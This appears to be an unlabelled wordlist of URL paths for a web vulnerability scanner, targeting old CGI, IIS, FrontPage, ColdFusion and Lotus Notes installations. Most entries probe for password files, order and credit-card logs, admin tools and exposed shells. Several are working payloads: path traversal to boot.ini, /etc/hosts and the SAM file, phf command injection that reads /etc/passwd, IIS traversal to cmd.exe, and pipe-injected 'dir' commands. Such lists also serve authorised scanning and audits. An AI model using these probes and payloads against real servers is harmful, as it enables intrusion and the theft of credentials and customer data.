 /usr/local/apache/share/htdocs/.htaccess
../..
../../boot.ini
/......../
/....../ all
/....../autoexec.bat
/....../config.sys
/....../etc/hosts
/../../../../ all
/../../../../../../../boot.ini
/../../../../../winnt/repair/sam._
/../../../../config.sys
/../../../../etc/hosts
/../../config.sys
/.access
/.bash_history
/.htaccess
/.html/............../config.sys
/.html/............./config.sys
/.html/............/autoexec.bat
/.htpasswd
/.passwd
/?PageServices
/_AuthChangeUrl
/_private
/_private/form_results.htm
/_private/form_results.txt
/_private/orders.htm
/_private/orders.txt
/_private/register.htm
/_private/register.txt
/_private/registrations.htm
/_private/registrations.txt
/_vti_bin
/_vti_bin/
/_vti_bin/_vti_adm
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_aut
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut/author.exe
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/fpcount.exe
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_vti_inf.html
/_vti_pvt
/_vti_pvt/access.cnf
/_vti_pvt/admin.pwd
/_vti_pvt/administrator.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/author.log
/_vti_pvt/authors.pwd
/_vti_pvt/service.cnf
/_vti_pvt/service.grp
/_vti_pvt/service.pwd
/_vti_pvt/service.stp
/_vti_pvt/services.cnf
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/svcacl.cnf
/_vti_pvt/users.pwd
/_vti_pvt/writeto.cnf
/_vti_pwd/administrators.pwd
/~
/~bin
/~guest
/~log
/~logs
/~lp
/~named
/~root
/~test
/~tmp
/admcgi/contents.htm
/admin.php3
/Admin_files/order.log
/adminlogin?RCpage=/sysadmin/index.stm
/admisapi/fpadmin.htm
/adsamples/config/site.csc
/AdvWorks/equipment/catalog_type.asp
/ASPSamp/AdvWorks/equipment/catalog_type.a
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/aux
/bb-dnbd/bb-hist.sh
/bin
/carbo.dll
/catalog.nsf
/ccbill/secure/ccbill.log
/cfappman/index.cfm
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/email/application.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/email/getfile.cfm?filen
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/exampleapp/publish/admin/addconten
/cfdocs/exampleapp/publish/admin/applicati
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/httpclient/mainframeset.cfm
/cfdocs/examples/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expressions.cfm
/cfdocs/root.cfm
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexist.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/viewexample.cfm
/cfdocs/zero.cfm
/CFIDE/Administrator/startstop.html
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
/cgi
/cgibin
/cgi-bin
/cgi-bin/
/cgi-bin/.cobalt/siteUserMod/siteUserMod.c
/cgi-bin/.fhp
/cgi-bin/add_ftp.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin/ads.setup
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/alibaba.pl\|dir
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/adp
/cgi-bin/allmanage/k
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanage/userfile.dat
/cgi-bin/allmanageup.pl
/cgi-bin/AnForm2
/cgi-bin/anyboard.cgi
/cgi-bin/AnyBoard.cgi
/cgi-bin/AnyForm
/cgi-bin/AnyForm2
/cgi-bin/archie
/cgi-bin/architext_query.cgi
/cgi-bin/architext_query.pl
/cgi-bin/ash
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/authorize/dbmfiles/users
/cgi-bin/ax.cgi
/cgi-bin/ax-admin.cgi
/cgi-bin/axs.cgi
/cgi-bin/bash
/cgi-bin/bb-hist.sh
/cgi-bin/bigconf.cgi
/cgi-bin/bigconf.cgi all
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform
/cgi-bin/bnbform.cgi
/cgi-bin/c_download.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/calendar
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/campas
/cgi-bin/carbo.dll
/cgi-bin/cart.pl
/cgi-bin/cgiback.cgi
/cgi-bin/cgi-lib.pl
/cgi-bin/cgimail.exe
/cgi-bin/Cgitest.exe
/cgi-bin/cgitest.exe
/cgi-bin/Cgitest.exe
/cgi-bin/cgiwrap
/cgi-bin/classified.cgi
/cgi-bin/classifieds
/cgi-bin/classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/Count.cgi
/cgi-bin/counterfiglet
/cgi-bin/csh
/cgi-bin/cvsweb/src/usr.bin/rdist/expand.c
/cgi-bin/dasp/fm_shell.asp
/cgi-bin/date
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5notifier
/cgi-bin/dbmlparser.exe
/cgi-bin/dfire.cgi
/cgi-bin/dig.cgi
/cgi-bin/displayTC.pl
/cgi-bin/dnewsweb
/cgi-bin/download.cgi
/cgi-bin/dumpenv.pl
/cgi-bin/echo.bat
/cgi-bin/edit.pl
/cgi-bin/enter.cgi
/cgi-bin/environ.cgi
/cgi-bin/ews
/cgi-bin/excite
/cgi-bin/faxsurvey
/cgi-bin/filemail
/cgi-bin/filemail.cgi
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger.cgi
/cgi-bin/finger.pl
/cgi-bin/flexform
/cgi-bin/flexform.cgi
/cgi-bin/form.cgi
/cgi-bin/FormHandler.cgi
/cgi-bin/formmail.pl
/cgi-bin/fortune
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/fpexplorer.exe
/cgi-bin/get32.exe
/cgi-bin/get32.exe\|dir
/cgi-bin/getdoc.cgi
/cgi-bin/gH.cgi
/cgi-bin/glimpse
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/GW5
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/GWWEB.EXE
/cgi-bin/handler
/cgi-bin/handler.cgi
/cgi-bin/hello.bat
/cgi-bin/htimage.exe
/cgi-bin/htmldocs
/cgi-bin/htmlscript
/cgi-bin/htsearch
/cgi-bin/icat
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin/iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap.exe
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/jj
/cgi-bin/k
/cgi-bin/ksh
/cgi-bin/loadpage.cgi
/cgi-bin/login.cgi
/cgi-bin/logs
/cgi-bin/lwgate
/cgi-bin/LWGate
/cgi-bin/LWGate.cgi
/cgi-bin/lwgate.cgi
/cgi-bin/MachineInfo
/cgi-bin/mail
/cgi-bin/mailform.exe
/cgi-bin/maillist.cgi
/cgi-bin/maillist.pl
/cgi-bin/makechanges/easysteps/easysteps.pl
/cgi-bin/man.sh
/cgi-bin/member
/cgi-bin/member.htm
/cgi-bin/member.html
/cgi-bin/members
/cgi-bin/members.htm
/cgi-bin/members.html
/cgi-bin/message.cgi
/cgi-bin/meta.pl
/cgi-bin/minimal.exe
/cgi-bin/mlog.phtml
/cgi-bin/mylog.phtml
/cgi-bin/netstat
/cgi-bin/news
/cgi-bin/news.htm
/cgi-bin/news.html
/cgi-bin/nlog-smb.cgi
/cgi-bin/nlog-smb.pl
/cgi-bin/nph-error.pl
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/cgi-bin/ntitar.pl
/cgi-bin/old
/cgi-bin/old.htm
/cgi-bin/old.html
/cgi-bin/old.txt
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/password
/cgi-bin/password.txt
/cgi-bin/perl
/cgi-bin/perl.exe
/cgi-bin/perlshop.cgi
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdisplay
/cgi-bin/pfdisplay.cgi
/cgi-bin/phf
/cgi-bin/phf.cgi
/cgi-bin/phf.pp
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
/cgi-bin/php
/cgi-bin/php.cgi
/cgi-bin/php.cgi?/etc/hosts
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/phpscan
/cgi-bin/plusmail
/cgi-bin/post_query
/cgi-bin/postcard.pl
/cgi-bin/post-query
/cgi-bin/ppdscgi.exe
/cgi-bin/printenv
/cgi-bin/process_bug.cgi
/cgi-bin/query
/cgi-bin/redir.exe
/cgi-bin/redirect
/cgi-bin/responder
/cgi-bin/responder.cgi
/cgi-bin/rguest.exe
/cgi-bin/rksh
/cgi-bin/rmp_query
/cgi-bin/rpm_query
/cgi-bin/rsh
/cgi-bin/rwwwshell.pl
/cgi-bin/sam._
/cgi-bin/search.cgi
/cgi-bin/search/tidfinder.cgi
/cgi-bin/search97.vts
/cgi-bin/sendform.cgi
/cgi-bin/settings.cfg
/cgi-bin/sh
/cgi-bin/snorkerz.bat
/cgi-bin/snorkerz.cmd
/cgi-bin/sojourn
/cgi-bin/sojourn.cgi
/cgi-bin/spin_client.cgi
/cgi-bin/stats.prg
/cgi-bin/statsconfig
/cgi-bin/status.cgi
/cgi-bin/survey
/cgi-bin/survey.cgi
/cgi-bin/tablebuild.pl
/cgi-bin/tcsh
/cgi-bin/test.bat
/cgi-bin/test-cgi
/cgi-bin/testcgi.exe
/cgi-bin/test-cgi.tcl
/cgi-bin/test-cgi?*
/cgi-bin/test-env
/cgi-bin/textcounter.pl
/cgi-bin/tigvote.cgi
/cgi-bin/tpgnrock
/cgi-bin/tst.bat
/cgi-bin/tst.bat\|dir
/cgi-bin/UltraBoard.cgi
/cgi-bin/ultraboard.cgi
/cgi-bin/UltraBoard.pl
/cgi-bin/ultraboard.pl
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/upload.pl
/cgi-bin/uptime
/cgi-bin/userfile.dat
/cgi-bin/view-source
/cgi-bin/visadmin.exe
/cgi-bin/visitor.exe
/cgi-bin/w2-msql
/cgi-bin/w3-msql
/cgi-bin/w3-msql/
/cgi-bin/w3-sql
/cgi-bin/w3tvars.pm
/cgi-bin/wais.pl
/cgi-bin/webbbs.cgi
/cgi-bin/webdist.cgi
/cgi-bin/webgais
/cgi-bin/webmap.cgi
/cgi-bin/webplus
/cgi-bin/websendmail
/cgi-bin/webutils.pl
/cgi-bin/webwho.pl
/cgi-bin/wguest.exe
/cgi-bin/whois.cgi
/cgi-bin/whois_raw.cgi
/cgi-bin/windmail.exe
/cgi-bin/wrap
/cgi-bin/wrap?/etc
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwboard.cgi
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/zsh
/cgi-dos/args.bat
/cgi-dos/args.cmd
/cgi-local
/cgi-shl/win-c-sample.exe
/cgi-src
/cgi-src/phf.c
/cgi-win
/cgi-win/uploader.exe
/cgi-win/wwwuploader.exe
/code.php3
/com1
/com2
/com3
/com4
/con
/con/con
/config/check.txt
/config/checks.txt
/config/import.txt
/config/mountain.cfg
/config/orders.txt
/cool-logs/mlog.html
/cool-logs/mylog.html
/database.nsf
/database.nsf/
/DataBase/
/default.asp.
/default.asp. HTTP/1.0
/default.asp::$DATA
/doc
/domcfg.nsf
/domcfg.nsf/?open
/domlog.nsf
/eatme.ida
/eatme.idc
/eatme.idq
/eatme.idw
/eatme.pl
/getdrvrs.exe
/GetFile.cfm
/hosts.dat
/html/?PageServices 
/iisadmin
/IISADMPWD/achg.htr
/iisadmpwd/achg.htr
/IISADMPWD/achg.htr
/iisadmpwd/aexp.htr
/IISADMPWD/aexp.htr
/iisadmpwd/aexp2.htr
/IISADMPWD/aexp2.htr
/iisadmpwd/aexp2b.htr
/IISADMPWD/aexp2b.htr
/iisadmpwd/aexp3.htr
/IISADMPWD/aexp3.htr
/IISADMPWD/aexp4.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/IISADMPWD/aexp4b.htr
/IISADMPWD/anot.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/IISADMPWD/anot3.htr
/iishelp/iis/misc/iirturnh.htw
/iissamples/exair/howitworks/codebrws.asp
/iissamples/exair/search/advsearch.asp
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iissamples/iissamples/query.asp
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/sdk/asp/docs/codebrws.asp
/index.asp::$DATA
/log
/log.nsf
/logs
/lpt
/main.asp%81
/mall_log_files/order.log
/manage/cgi/cgiproc
/member
/member.htm
/member.html
/members
/members.htm
/members.html
/msadc/msadcs.dll
/msadc/samples/adctest.asp
/msadc/Samples/SELECTOR/codebrws.cfm
/msadc/Samples/SELECTOR/showcode.asp
/msads/Samples/SELECTOR/showcode.asp
/msads/samples/selector/showcode.asp
/names.nsf
/ncl_items.html
/neowebscript/test/senvironment.nhtml
/neowebscript/tests/load_webenv.nhtml
/neowebscript/tests/mailtest.nhtml
/news
/news.htm
/news.html
/officescan/cgi/jdkRqNotify.exe
/old
/old.htm
/old.html
/old.txt
/order/order.log
/orders/checks.txt
/orders/import.txt
/orders/mountain.cfg
/orders/order.log
/Orders/order.log
/orders/orders.txt
/passwd
/passwd.txt
/password
/password.txt
/PDG_Cart/order.log
/PDG_Cart/shopper.conf
/ping all
/ping?SomeCrapHere
/piranha/secure/passwd.php3
/PSUser/PSCOErrPage.htm
/publisher/
/pw/storemgr.pw
/quikstore.cfg
/reviews/newpro.cgi
/samples/isapi/srch.htm
/samples/search/queryhit.htm
/samples/search/webhits.exe
/scripts
/scripts/
/scripts/../../cmd.exe
/scripts/../../cmd.exe?%2FC+echo+\'hacked!
/scripts/c32web.exe
/scripts/c32web.exe/ChangeAdminPassword
/scripts/cart32.exe
/scripts/cart32.exe/cart32clientlist
/scripts/CGImail.exe
/scripts/cmd.exe
/scripts/convert.bas
/scripts/counter.exe
/scripts/cpshost.dll
/scripts/dbman/db.cgi?db=invalid-db
/scripts/emurl/RECMAN.dll
/scripts/Fpadmcgi.exe
/scripts/fpcount.exe
/scripts/iisadmin/bdir.htr
/scripts/iisadmin/default.htm
/scripts/iisadmin/ism.dll
/scripts/iisadmin/ism.dll?http/dir
/scripts/iisadmin/samples/ctgestb.htx
/scripts/iisadmin/samples/ctgestb.idc
/scripts/iisadmin/samples/details.htx
/scripts/iisadmin/samples/details.idc
/scripts/iisadmin/samples/query.htx
/scripts/iisadmin/samples/query.idc
/scripts/iisadmin/samples/register.htx
/scripts/iisadmin/samples/register.idc
/scripts/iisadmin/samples/sample.htx
/scripts/iisadmin/samples/sample.idc
/scripts/iisadmin/samples/sample2.htx
/scripts/iisadmin/samples/viewbook.htx
/scripts/iisadmin/samples/viewbook.idc
/scripts/iisadmin/tools/ct.htx
/scripts/iisadmin/tools/ctss.idc
/scripts/iisadmin/tools/dsnform.exe
/scripts/iisadmin/tools/getdrvrs.exe
/scripts/iisadmin/tools/mkilog.exe
/scripts/iisadmin/tools/newdsn.exe
/scripts/issadmin/bdir.htr
/scripts/no-such-file.pl
/scripts/perl
/scripts/perl.exe
/scripts/perl?
/scripts/postinfo.asp
/scripts/proxy/w3proxy.dll
/scripts/pu3.pl
/scripts/repost.asp
/scripts/run.exe
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/samples/search/webhits.exe
/scripts/slxweb.dll
/scripts/srchadm/admin.idq
/scripts/submit.cgi
/scripts/tools/dsnform.exe
/scripts/tools/getdrvrs.exe
/scripts/tools/getdrvs.exe
/scripts/tools/mkilog.exe
/scripts/tools/newdsn.exe
/scripts/upload.asp
/scripts/uploadn.asp
/scripts/uploadx.asp
/scripts/visadmin.exe
/scripts/wa.exe
/scripts/webbbs.exe
/scripts/wsisa.dll
/search
/search97.vts
/search97.vts /
/secure/.htaccess
/secure/.wwwacl
/server-status
/session/adminlogin
/session/admnlogin
/showfile.asp
/smdata.dat
/srchadm
/ss.cfg
/ssi/envout.bat
/stats
/status
/status.cgi
/test/test.cgi
/today.nsf
/tools/newdsn.exe
/tree.dat
/users/scripts/submit.cgi
/usr/local/apache/share/htdocs/.htaccess
/webcart/
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/WebShop/templates/cc.txt
/WebSTAR
/WebSTART%20LOG
/ws_ftp.ini
/wwwboard/passwd.txt
/xxxxxxx.....xxxxxxxxx/
